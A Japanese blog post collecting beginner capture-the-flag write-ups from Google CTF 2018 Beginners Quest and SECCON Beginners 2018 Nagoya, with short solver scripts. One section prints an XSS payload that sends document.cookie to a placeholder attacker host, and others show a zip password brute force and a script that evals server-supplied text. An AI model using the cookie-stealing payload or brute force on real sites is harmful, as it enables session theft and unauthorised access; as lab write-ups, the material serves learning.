Google CTF 2018 Beginners Quest 問題解説

Wed, 19 Dec 2018 08:54:08 +0900

この記事はCTF Advent Calendar 2018 19日目の記事です。18日目はmage_1868さんのMortAl mage aGEnts write-upでした。

CTFビギナーなのでGoogle CTF 2018 Beginners Questを解いており、Diaryで書いているWriteupsをまとめます。全て解き終わらなかったので残りは解け次第追記します。

解くにあたり使ったツールも書こうとしてたんですが、長文になるため別機会で。コメントがあればTwitterもしくはMastodonまでお願いします。

Misc

LETTER

PDFファイルが1つ与えられる。Viewerによる検索でフラグを得る。

OCR IS COOL!

Gmailのメール本文がキャプチャされたPNGファイルが1つ与えられる。

文面からROT Nと考えられ、本文中のVMY{vtxltkvbiaxkbltlnulmbmnmbhgvbiaxk}を復号する。フラグはCTF{...}の形式であるため、ROT 7であると分かる。

復号にはCyberChefを用いた。

SECURITY BY OBSCURITY

ファイルが1つ与えられる。file commandによりzipだと分かるため展開する。

ある程度展開すると他の拡張子に変化するためコマンドを変えてまた展開する、ということをzip, xz, bz2, gzと行っていくと、最後にパスワード付きのzipが現れる。

brute forceでパスワードを確認し、展開してフラグを得る。ここではfcrackdiscを用いた。

展開スクリプト

import os
import filetype
import zipfile
import subprocess
import gzip

filepath = 'password.x.a.b.c.d.e.f.g.h.i.j.k.l.m.n.o.p.a.b.c.d.e.f.g.h.i.j.k.l.m.n.o.p.p.o.n.m.l.k.j.i.h.g.f.e.d.c.b.a.a.b.c.d.e.f.g.h.i.j.k.l.m.n.o.p'

while True:
    extension = filetype.guess(filepath).extension
    print('%s: %s' % (extension, filepath))
    if extension == 'zip':
        with zipfile.ZipFile(filepath) as f:
            f.extractall()
    elif extension == 'xz':
        subprocess.call(['7z', 'e', filepath])
    elif extension == 'bz2':
        subprocess.call(['bzip2', '-d', filepath])
        os.rename(filepath + '.out', '.'.join(filepath.split('.')[0:-1]))
    elif extension == 'gz':
        with gzip.open(filepath) as f:
            with open('.'.join(filepath.split('.')[0:-1]), 'wb') as nf:
                nf.write(f.read())

    filepath = '.'.join(filepath.split('.')[0:-1])

brute force

$ fcrackzip -l 4 -u -b password.x
PASSWORD FOUND!!!!: pw == asdf
$ unzip password.x
Archive:  password.x
[password.x] password.txt password:
 extracting: password.txt
$ cat password.txt
CTF{DUMMY_FLAG}

FLOPPY

$ file foo.ico
foo.ico: MS Windows icon resource - 1 icon, 32x32, 16 colors

ico fileが与えられる。画像自体に気になる点は無いため、バイナリエディタで内容を確認。

SECCON Beginners 2018 Nagoya CTF Writeups

Sat, 24 Nov 2018 20:51:48 +0900

60+N人中7位。問題は公開されていない。

Calc

SECCON Beginners CTF 2018 てけいさんえくすとりーむずのHTML版。ただし回答の時間制限は無い。

数式を取得し、結果をPOSTする。アクセスユーザ識別のためのCookie設定を忘れないこと。

import urllib.request
import urllib.parse
from bs4 import BeautifulSoup
from http.cookiejar import CookieJar

url = "http://10.2.6.1:8080/index.php"

opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(CookieJar()))
res = opener.open(url)
html = res.read().decode("utf-8")
soup = BeautifulSoup(html, "html.parser")
exp = soup.find("div").text

for _ in range(100):
    data = urllib.parse.urlencode({'answer':eval(exp)}).encode('utf-8')
    res = opener.open(url, data)
    html = res.read().decode("utf-8")
    print(html)
    soup = BeautifulSoup(html, "html.parser")
    exp = soup.find("div").text

do alert

用意されたformに<script>alert(0)</script>を仕込んでリロード

ASカンパニー

formから任意のtitleとtextを投稿するページがあり、投稿結果をクローラが巡回している。クローラのUAにFLAGが書かれている。

formにはscriptを仕込むことができるため、<script>document.location="http://<attacker>?"+encodeURIComponent(document.cookie)</script>をtitleまたはtextに仕込んでクローラのアクセス結果を確認する。

Go Fast

計算するだけ

print(2**4085 % 97)

Factoring

素因数分解するだけ

$ factor 2240118421
2240118421: 43223 51827

Find it.

ELF file bin1が与えられる。xxdでフラグを得る。

xxd bin1 | grep -A1 ctf
0001060: 6374 6634 627b 666c 3467 5f6e 3037 5f31  ctf4b{dummy____
0001070: 6e5f 6330 6433 5f35 3367 6d33 6e37 7d00  _________flag}.

Read it.

genflag sectionにFLAGが直書きされている。

CTF on Unigiri